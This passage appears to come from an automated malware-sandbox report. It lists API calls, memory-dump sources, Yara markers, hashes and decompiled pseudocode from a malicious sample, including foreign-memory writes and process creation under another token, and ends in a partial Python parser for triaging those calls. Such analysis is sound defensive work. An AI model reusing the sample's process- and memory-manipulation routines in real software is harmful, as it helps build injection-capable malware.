                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1700061692-0
                                                                                                                                        • Opcode ID: e145d1f779a64ab0e3142dd73626b454fc6bbde11d1e29608d5f5f0d8b962e5d
                                                                                                                                        • Instruction ID: 89820a3b110e3d80935c849210a48228e5b25bde92283f44800986a48597349f
                                                                                                                                        • Opcode Fuzzy Hash: e145d1f779a64ab0e3142dd73626b454fc6bbde11d1e29608d5f5f0d8b962e5d
                                                                                                                                        • Instruction Fuzzy Hash: 8DF0A9B0305311AFF3545B699C88F6B779CEB86374B15063AF621C62E0DAA44C0AC57E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E73751371() {
                                                                                                                                        				void* _t1;
                                                                                                                                        				long _t3;
                                                                                                                                        				void* _t4;
                                                                                                                                        				long _t5;
                                                                                                                                        				void* _t6;
                                                                                                                                        				intOrPtr _t8;
                                                                                                                                        
                                                                                                                                        				_t8 =  *0x73754130;
                                                                                                                                        				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                        				 *0x7375413c = _t1;
                                                                                                                                        				if(_t1 == 0) {
                                                                                                                                        					return GetLastError();
                                                                                                                                        				}
                                                                                                                                        				_t3 = GetVersion();
                                                                                                                                        				if(_t3 <= 5) {
                                                                                                                                        					_t4 = 0x32;
                                                                                                                                        					return _t4;
                                                                                                                                        				} else {
                                                                                                                                        					 *0x7375412c = _t3;
                                                                                                                                        					_t5 = GetCurrentProcessId();
                                                                                                                                        					 *0x73754128 = _t5;
                                                                                                                                        					 *0x73754130 = _t8;
                                                                                                                                        					_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                        					 *0x73754124 = _t6;
                                                                                                                                        					if(_t6 == 0) {
                                                                                                                                        						 *0x73754124 =  *0x73754124 | 0xffffffff;
                                                                                                                                        					}
                                                                                                                                        					return 0;
                                                                                                                                        				}
                                                                                                                                        			}

APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,73751DA3), ref: 73751380
• GetVersion.KERNEL32(?,73751DA3), ref: 7375138F
• GetCurrentProcessId.KERNEL32(?,73751DA3), ref: 7375139E
• OpenProcess.KERNEL32(0010047A,00000000,00000000,?,73751DA3), ref: 737513B7
Memory Dump Source
• Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
• Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
• Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
Similarity
• API ID: Process$CreateCurrentEventOpenVersion
• String ID:
• API String ID: 845504543-0
• Opcode ID: 841238d0568f05a7303952ea6792e7e78989aaef8d3e18e1cc0d407198daccce
• Instruction ID: 92f0f740639abccf15f5724973b4f48b491c2afb53b979e243400713b839e093
• Opcode Fuzzy Hash: 841238d0568f05a7303952ea6792e7e78989aaef8d3e18e1cc0d407198daccce
• Instruction Fuzzy Hash: EFF06D73644326DBFB48BF6BAC0A7447BA5F718722F30001AF18EC61D0D3B940408B48
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 00465AA2
• GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 00465AE2
  • Part of subcall function 00453A77: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,004575FD,00000000,?,004575FD,?,00000000,00000000,00000318,00000020,00000000,00010003,?), ref: 00453A95
• RtlNtStatusToDosError.NTDLL(00000000), ref: 00465AEB
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
• String ID:
• API String ID: 4036914670-0
• Opcode ID: 2c8c530381bb892093febc183879cd25ca3de93a768ed6edc89fec57da4d328b
• Instruction ID: 88f056138e20c572742e7949bb47742588361cdc74516e7c5a79cec281562ec4
• Opcode Fuzzy Hash: 2c8c530381bb892093febc183879cd25ca3de93a768ed6edc89fec57da4d328b
• Instruction Fuzzy Hash: 6D012875900508FFEF11AB91DD45DAEBBBDFB84700F10052AF941E2150EBA5D9049B66
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID: $8RF
• API String ID: 0-368676651
• Opcode ID: 8c3066997f3812fd9602f480da161331cbe6e63b15e41cc79c63d9b7b6982fcc
                                                                                                                                        • Instruction ID: f3ca9e32dfdc9fbdf9343432409eb16169fb1a0c5309ce37333644083ddc0fdb
                                                                                                                                        • Opcode Fuzzy Hash: 8c3066997f3812fd9602f480da161331cbe6e63b15e41cc79c63d9b7b6982fcc
                                                                                                                                        • Instruction Fuzzy Hash: E3428C70A04B458FDB29CF69C4906BEB7F1FF59304F14896EC48697752DB38A886CB18
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 00446F42
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(C000009A), ref: 00446F79
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2533303245-0
                                                                                                                                        • Opcode ID: 2afbc6f39676b9eae65bf4fa929052e75e79188587fa3f5a9272b6dff1626132
                                                                                                                                        • Instruction ID: d56180873e54a8b0df5e9642df864a64b0fc0bc203a3bc86920bfa5fdf93337e
                                                                                                                                        • Opcode Fuzzy Hash: 2afbc6f39676b9eae65bf4fa929052e75e79188587fa3f5a9272b6dff1626132
                                                                                                                                        • Instruction Fuzzy Hash: DA012B33802120BBE7215B519C04AAFBA69EF47B52F13012BFD8563200DB388D0896EE
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004500A3
                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 004500BB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationProcessQuerymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2040988606-0
                                                                                                                                        • Opcode ID: 386b0d0cbe034a42136669f89b1fc656de37d1e422e927811be439ac10b5e6a7
                                                                                                                                        • Instruction ID: 14fc9d11985b1b4295263b8b1abfd2456d73b229ede7d64cff2a77a35d6a09e7
                                                                                                                                        • Opcode Fuzzy Hash: 386b0d0cbe034a42136669f89b1fc656de37d1e422e927811be439ac10b5e6a7
                                                                                                                                        • Instruction Fuzzy Hash: 1DF0447690022C6AEB10DA91DC05FDE7B7CEB14740F0080A5FE04E2181E774DA45CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(C0000002), ref: 00442D53
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00458477,?,?,?,00000004,?,00000000,0046E088,?,00000000), ref: 00442D5A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$LastStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4076355890-0
                                                                                                                                        • Opcode ID: 1d213c02c091450cc80465fae341b0fd4890600d05d7b8cd6f85e3db92a0ee59
                                                                                                                                        • Instruction ID: da83806fe12231eaa15b8ceaaefc456cbbba120b9641281198f9fabdcf1d95cb
                                                                                                                                        • Opcode Fuzzy Hash: 1d213c02c091450cc80465fae341b0fd4890600d05d7b8cd6f85e3db92a0ee59
                                                                                                                                        • Instruction Fuzzy Hash: A2E04F72A0021ABBDF115FE4DD08D9B7BADFB08741B404025FE01C2131DBB5C861ABE5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004495B0
                                                                                                                                        • memset.NTDLL ref: 004495BF
                                                                                                                                          • Part of subcall function 0045D5A3: memset.NTDLL ref: 0045D5B4
                                                                                                                                          • Part of subcall function 0045D5A3: memset.NTDLL ref: 0045D5C0
                                                                                                                                          • Part of subcall function 0045D5A3: memset.NTDLL ref: 0045D5EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                        • Opcode ID: 384b149705da2cf4cd3d4b80baa90d7ed373540311f1b3196bf74c1f5a83336c
                                                                                                                                        • Instruction ID: 2a22481785639622ceab140a91854384565e9032e55e3fa3e7472f64970a2301
                                                                                                                                        • Opcode Fuzzy Hash: 384b149705da2cf4cd3d4b80baa90d7ed373540311f1b3196bf74c1f5a83336c
                                                                                                                                        • Instruction Fuzzy Hash: 4F022071501B218FEB79CF29C680527B7F1BF567147604E2ED6E786A90E239F881DB08
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                        • Opcode ID: 2b2498c541d4775188133c0a7959ecd8b364d41e93bf25284642e790f5a903b2
                                                                                                                                        • Instruction ID: 3a73e53f5bcc4035c47b35a964ca3fd9620bc248780cf475281b15197fc3a2ce
                                                                                                                                        • Opcode Fuzzy Hash: 2b2498c541d4775188133c0a7959ecd8b364d41e93bf25284642e790f5a903b2
                                                                                                                                        • Instruction Fuzzy Hash: 2822837BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,00000001,00000000,000000FE,?,00000000,00000000), ref: 0045C193
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                        • Opcode ID: e10c0db2a11589fb2f19a5f7fdd216aae94fb1245db8aacb142af03284e49702
                                                                                                                                        • Instruction ID: 2b8711e2fa8fcbd5f20f6775718457011f966b8fffb7c26e742fd6af5cfe0e14
                                                                                                                                        • Opcode Fuzzy Hash: e10c0db2a11589fb2f19a5f7fdd216aae94fb1245db8aacb142af03284e49702
                                                                                                                                        • Instruction Fuzzy Hash: 3E322571A00704DFDB15CF98C4806AEBBB1FF55312F2481AADC15AB286D7789A49CB84
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 100%
E737524C5(long _a4) {
	intOrPtr _v8;
	intOrPtr _v12;
	signed int _v16;
	short* _v32;
	void _v36;
	void* _t57;
	signed int _t58;
	signed int _t61;
	signed int _t62;
	void* _t63;
	signed int* _t68;
	intOrPtr* _t69;
	intOrPtr* _t71;
	intOrPtr _t72;
	intOrPtr _t75;
	void* _t76;
	signed int _t77;
	void* _t78;
	void _t80;
	signed int _t81;
	signed int _t84;
	signed int _t86;
	short* _t87;
	void* _t89;
	signed int* _t90;
	long _t91;
	signed int _t93;
	signed int _t94;
	signed int _t100;
	signed int _t102;
	void* _t104;
	long _t108;
	signed int _t110;

	_t108 = _a4;
	_t76 =  *(_t108 + 8);
	if((_t76 & 0x00000003) != 0) {
		L3:
		return 0;
	}
	_a4 =  *[fs:0x4];
	_v8 =  *[fs:0x8];
	if(_t76 < _v8 || _t76 >= _a4) {
		_t102 =  *(_t108 + 0xc);
		__eflags = _t102 - 0xffffffff;
		if(_t102 != 0xffffffff) {
			_t91 = 0;
			__eflags = 0;
			_a4 = 0;
			_t57 = _t76;
			do {
				_t80 =  *_t57;
				__eflags = _t80 - 0xffffffff;
				if(_t80 == 0xffffffff) {
					goto L9;
				}
				__eflags = _t80 - _t91;
				if(_t80 >= _t91) {
					L20:
					_t63 = 0;
					L60:
					return _t63;
				}
				L9:
				__eflags =  *(_t57 + 4);
				if( *(_t57 + 4) != 0) {
					_t12 =  &_a4;
					 *_t12 = _a4 + 1;
					__eflags =  *_t12;
				}
				_t91 = _t91 + 1;
				_t57 = _t57 + 0xc;
				__eflags = _t91 - _t102;
			} while (_t91 <= _t102);
			__eflags = _a4;
			if(_a4 == 0) {
				L15:
				_t81 =  *0x73754178;
				_t110 = _t76 & 0xfffff000;
				_t58 = 0;
				__eflags = _t81;
				if(_t81 <= 0) {
					L18:
                                                                                                                                        								_t104 = _t102 | 0xffffffff;
                                                                                                                                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                        								__eflags = _t61;
                                                                                                                                        								if(_t61 < 0) {
                                                                                                                                        									_t62 = 0;
                                                                                                                                        									__eflags = 0;
                                                                                                                                        								} else {
                                                                                                                                        									_t62 = _a4;
                                                                                                                                        								}
                                                                                                                                        								__eflags = _t62;
                                                                                                                                        								if(_t62 == 0) {
                                                                                                                                        									L59:
                                                                                                                                        									_t63 = _t104;
                                                                                                                                        									goto L60;
                                                                                                                                        								} else {
                                                                                                                                        									__eflags = _v12 - 0x1000000;
                                                                                                                                        									if(_v12 != 0x1000000) {
                                                                                                                                        										goto L59;
                                                                                                                                        									}
                                                                                                                                        									__eflags = _v16 & 0x000000cc;
                                                                                                                                        									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                        										L46:
                                                                                                                                        										_t63 = 1;
                                                                                                                                        										 *0x737541c0 = 1;
                                                                                                                                        										__eflags =  *0x737541c0;
                                                                                                                                        										if( *0x737541c0 != 0) {
                                                                                                                                        											goto L60;
                                                                                                                                        										}
                                                                                                                                        										_t84 =  *0x73754178;
                                                                                                                                        										__eflags = _t84;
                                                                                                                                        										_t93 = _t84;
                                                                                                                                        										if(_t84 <= 0) {
                                                                                                                                        											L51:
                                                                                                                                        											__eflags = _t93;
                                                                                                                                        											if(_t93 != 0) {
                                                                                                                                        												L58:
                                                                                                                                        												 *0x737541c0 = 0;
                                                                                                                                        												goto L5;
                                                                                                                                        											}
                                                                                                                                        											_t77 = 0xf;
                                                                                                                                        											__eflags = _t84 - _t77;
                                                                                                                                        											if(_t84 <= _t77) {
                                                                                                                                        												_t77 = _t84;
                                                                                                                                        											}
                                                                                                                                        											_t94 = 0;
                                                                                                                                        											__eflags = _t77;
                                                                                                                                        											if(_t77 < 0) {
                                                                                                                                        												L56:
                                                                                                                                        												__eflags = _t84 - 0x10;
                                                                                                                                        												if(_t84 < 0x10) {
                                                                                                                                        													_t86 = _t84 + 1;
                                                                                                                                        													__eflags = _t86;
                                                                                                                                        													 *0x73754178 = _t86;
                                                                                                                                        												}
                                                                                                                                        												goto L58;
                                                                                                                                        											} else {
                                                                                                                                        												do {
                                                                                                                                        													_t68 = 0x73754180 + _t94 * 4;
                                                                                                                                        													_t94 = _t94 + 1;
                                                                                                                                        													__eflags = _t94 - _t77;
                                                                                                                                        													 *_t68 = _t110;
                                                                                                                                        													_t110 =  *_t68;
                                                                                                                                        												} while (_t94 <= _t77);
                                                                                                                                        												goto L56;
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        										_t69 = 0x7375417c + _t84 * 4;
                                                                                                                                        										while(1) {
                                                                                                                                        											__eflags =  *_t69 - _t110;
                                                                                                                                        											if( *_t69 == _t110) {
                                                                                                                                        												goto L51;
                                                                                                                                        											}
                                                                                                                                        											_t93 = _t93 - 1;
                                                                                                                                        											_t69 = _t69 - 4;
                                                                                                                                        											__eflags = _t93;
                                                                                                                                        											if(_t93 > 0) {
                                                                                                                                        												continue;
                                                                                                                                        											}
                                                                                                                                        											goto L51;
                                                                                                                                        										}
                                                                                                                                        										goto L51;
                                                                                                                                        									}
                                                                                                                                        									_t87 = _v32;
                                                                                                                                        									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                        									if( *_t87 != 0x5a4d) {
                                                                                                                                        										goto L59;
                                                                                                                                        									}
                                                                                                                                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                        									__eflags =  *_t71 - 0x4550;
                                                                                                                                        									if( *_t71 != 0x4550) {
                                                                                                                                        										goto L59;
                                                                                                                                        									}
                                                                                                                                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                        										goto L59;
                                                                                                                                        									}
                                                                                                                                        									_t78 = _t76 - _t87;
                                                                                                                                        									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                        									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                        										goto L59;
                                                                                                                                        									}
                                                                                                                                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                        									__eflags = _t78 - _t72;
                                                                                                                                        									if(_t78 < _t72) {
                                                                                                                                        										goto L46;
                                                                                                                                        									}
                                                                                                                                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                        										goto L46;
                                                                                                                                        									}
                                                                                                                                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                        										goto L20;
                                                                                                                                        									}
                                                                                                                                        									goto L46;
                                                                                                                                        								}
                                                                                                                                        							} else {
                                                                                                                                        								goto L16;
                                                                                                                                        							}
                                                                                                                                        							while(1) {
                                                                                                                                        								L16:
                                                                                                                                        								__eflags =  *((intOrPtr*)(0x73754180 + _t58 * 4)) - _t110;
                                                                                                                                        								if( *((intOrPtr*)(0x73754180 + _t58 * 4)) == _t110) {
                                                                                                                                        									break;
                                                                                                                                        								}
                                                                                                                                        								_t58 = _t58 + 1;
                                                                                                                                        								__eflags = _t58 - _t81;
                                                                                                                                        								if(_t58 < _t81) {
                                                                                                                                        									continue;
                                                                                                                                        								}
                                                                                                                                        								goto L18;
                                                                                                                                        							}
                                                                                                                                        							__eflags = _t58;
                                                                                                                                        							if(_t58 <= 0) {
                                                                                                                                        								goto L5;
                                                                                                                                        							}
                                                                                                                                        							 *0x737541c0 = 1;
                                                                                                                                        							__eflags =  *0x737541c0;
                                                                                                                                        							if( *0x737541c0 != 0) {
                                                                                                                                        								goto L5;
                                                                                                                                        							}
                                                                                                                                        							__eflags =  *((intOrPtr*)(0x73754180 + _t58 * 4)) - _t110;
                                                                                                                                        							if( *((intOrPtr*)(0x73754180 + _t58 * 4)) == _t110) {
                                                                                                                                        								L32:
                                                                                                                                        								_t100 = 0;
                                                                                                                                        								__eflags = _t58;
                                                                                                                                        								if(_t58 < 0) {
                                                                                                                                        									L34:
                                                                                                                                        									 *0x737541c0 = 0;
                                                                                                                                        									goto L5;
                                                                                                                                        								} else {
                                                                                                                                        									goto L33;
                                                                                                                                        								}
                                                                                                                                        								do {
                                                                                                                                        									L33:
                                                                                                                                        									_t90 = 0x73754180 + _t100 * 4;
                                                                                                                                        									_t100 = _t100 + 1;
                                                                                                                                        									__eflags = _t100 - _t58;
                                                                                                                                        									 *_t90 = _t110;
                                                                                                                                        									_t110 =  *_t90;
                                                                                                                                        								} while (_t100 <= _t58);
                                                                                                                                        								goto L34;
                                                                                                                                        							}
                                                                                                                                        							_t58 = _t81 - 1;
                                                                                                                                        							__eflags = _t58;
                                                                                                                                        							if(_t58 < 0) {
                                                                                                                                        								L28:
                                                                                                                                        								__eflags = _t81 - 0x10;
                                                                                                                                        								if(_t81 < 0x10) {
                                                                                                                                        									_t81 = _t81 + 1;
                                                                                                                                        									__eflags = _t81;
                                                                                                                                        									 *0x73754178 = _t81;
                                                                                                                                        								}
                                                                                                                                        								_t58 = _t81 - 1;
                                                                                                                                        								goto L32;
                                                                                                                                        							} else {
                                                                                                                                        								goto L25;
                                                                                                                                        							}
                                                                                                                                        							while(1) {
                                                                                                                                        								L25:
                                                                                                                                        								__eflags =  *((intOrPtr*)(0x73754180 + _t58 * 4)) - _t110;
                                                                                                                                        								if( *((intOrPtr*)(0x73754180 + _t58 * 4)) == _t110) {
                                                                                                                                        									break;
                                                                                                                                        								}
                                                                                                                                        								_t58 = _t58 - 1;
                                                                                                                                        								__eflags = _t58;
                                                                                                                                        								if(_t58 >= 0) {
                                                                                                                                        									continue;
                                                                                                                                        								}
                                                                                                                                        								break;
                                                                                                                                        							}
                                                                                                                                        							__eflags = _t58;
                                                                                                                                        							if(__eflags >= 0) {
                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                        									goto L34;
                                                                                                                                        								}
                                                                                                                                        								goto L32;
                                                                                                                                        							}
                                                                                                                                        							goto L28;
                                                                                                                                        						}
                                                                                                                                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                        						__eflags = _t75 - _v8;
                                                                                                                                        						if(_t75 < _v8) {
                                                                                                                                        							goto L20;
                                                                                                                                        						}
                                                                                                                                        						__eflags = _t75 - _t108;
                                                                                                                                        						if(_t75 >= _t108) {
                                                                                                                                        							goto L20;
                                                                                                                                        						}
                                                                                                                                        						goto L15;
                                                                                                                                        					}
                                                                                                                                        					L5:
                                                                                                                                        					_t63 = 1;
                                                                                                                                        					goto L60;
                                                                                                                                        				} else {
                                                                                                                                        					goto L3;
                                                                                                                                        				}
                                                                                                                                        			}
                                                                                                                                        0x737525f4
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525e0
                                                                                                                                        0x737525e0
                                                                                                                                        0x737525e0
                                                                                                                                        0x737525e9
                                                                                                                                        0x737525ea
                                                                                                                                        0x737525ec
                                                                                                                                        0x737525ee
                                                                                                                                        0x737525ee
                                                                                                                                        0x00000000
                                                                                                                                        0x737525e0
                                                                                                                                        0x737525b0
                                                                                                                                        0x737525b3
                                                                                                                                        0x737525b5
                                                                                                                                        0x737525c7
                                                                                                                                        0x737525c7
                                                                                                                                        0x737525ca
                                                                                                                                        0x737525cc
                                                                                                                                        0x737525cc
                                                                                                                                        0x737525cd
                                                                                                                                        0x737525cd
                                                                                                                                        0x737525d3
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525b7
                                                                                                                                        0x737525b7
                                                                                                                                        0x737525b7
                                                                                                                                        0x737525be
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525c0
                                                                                                                                        0x737525c0
                                                                                                                                        0x737525c1
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525c1
                                                                                                                                        0x737525c3
                                                                                                                                        0x737525c5
                                                                                                                                        0x737525d8
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525d8
                                                                                                                                        0x00000000
                                                                                                                                        0x737525c5
                                                                                                                                        0x73752537
                                                                                                                                        0x7375253a
                                                                                                                                        0x7375253d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x7375253f
                                                                                                                                        0x73752541
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752541
                                                                                                                                        0x73752506
                                                                                                                                        0x73752508
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000

APIs
• NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 73752576
Memory Dump Source
• Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
• Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
• Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
Similarity
• API ID: MemoryQueryVirtual
• String ID:
• API String ID: 2850889275-0
• Opcode ID: 1985d5cd2e313fbed3e61c7aee99968885a1c13111b863f98b09d3ffdb2ebd77
• Instruction ID: 66e9834c209372891d5a4cb19c3a299b163f9e09570e537afce57d06b9852342
• Opcode Fuzzy Hash: 1985d5cd2e313fbed3e61c7aee99968885a1c13111b863f98b09d3ffdb2ebd77
• Instruction Fuzzy Hash: A161C57160161E9FE70ECF2AC9A071A37BAFB85354B3881A9F817C76D4E731D882C650
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 3fb857938dd67feabd2887d2846e2b313f19e45705a22e99bffac38c0e30d1e8
• Instruction ID: 7e315773e6730110cda368655add75efa57f9185f142b101ca0de4305b3b8031
• Opcode Fuzzy Hash: 3fb857938dd67feabd2887d2846e2b313f19e45705a22e99bffac38c0e30d1e8
• Instruction Fuzzy Hash: 43D16E30E0024ADBCF18CFA8C4906EEB7B1FF99305F24856ED85297361E7789959CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00442FD5
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: af07084d0142162356b83eb1b928f4e3a2d95a3d8d0831b172b0c1367a7f1edc
• Instruction ID: 8b7128e9916ffb41ed140fd2c4116b8a75cfdef105cd2508fb011ab3405d104b
• Opcode Fuzzy Hash: af07084d0142162356b83eb1b928f4e3a2d95a3d8d0831b172b0c1367a7f1edc
• Instruction Fuzzy Hash: 6C11D232204149BFEF025F99DD00DDA7BB6FF08364B854225FE1952120D776D871AB54
Uniqueness

Uniqueness Score: -1.00%
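The function blocks above (the NtQueryVirtualMemory block in the 73750000 dump and the CreateProcessAsUserW block in the 00440000 dump) follow a fixed text layout: a header line ("APIs", "Memory Dump Source", "Yara matches", "Similarity") followed by "•" bullets. The script below is an added example written for this page; it is not Joe Sandbox code and not code from the sample. It parses that layout, records which dump a call site came from and whether the dump was PE-backed, and flags calls worth a second look. The sample text is copied from the two blocks above; the list of suspicious APIs is the editor's own assumption. The decoding of the NtQueryVirtualMemory arguments rests on the documented Windows values: MemoryInformationClass 0 is MemoryBasicInformation, and 0x1C (28) bytes is sizeof(MEMORY_BASIC_INFORMATION) on 32-bit Windows, so that call is a plain region walk, consistent with the "Allocates memory in foreign processes" and "Writes to foreign memory regions" signatures listed for this sample.

```python
"""Added example (editor's code, not Joe Sandbox's): parse the 'APIs' /
'Memory Dump Source' function blocks shown on this page and triage them."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: two blocks copied from the report above.
SAMPLE = """APIs
• NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 73752576
Memory Dump Source
• Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
Similarity
• API ID: MemoryQueryVirtual

APIs
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00442FD5
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CreateProcessUser
"""

API_RE = re.compile(r"^(?P<name>\w+)\.(?P<dll>[\w.]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")

# Editor's triage list (assumption, not from the report): APIs worth a second look here.
SUSPICIOUS = {
    "CreateProcessAsUserW": "process creation under another token",
    "NtQueryVirtualMemory": "memory layout probing",
    "NtWriteVirtualMemory": "foreign memory write",
}

@dataclass
class ApiCall:
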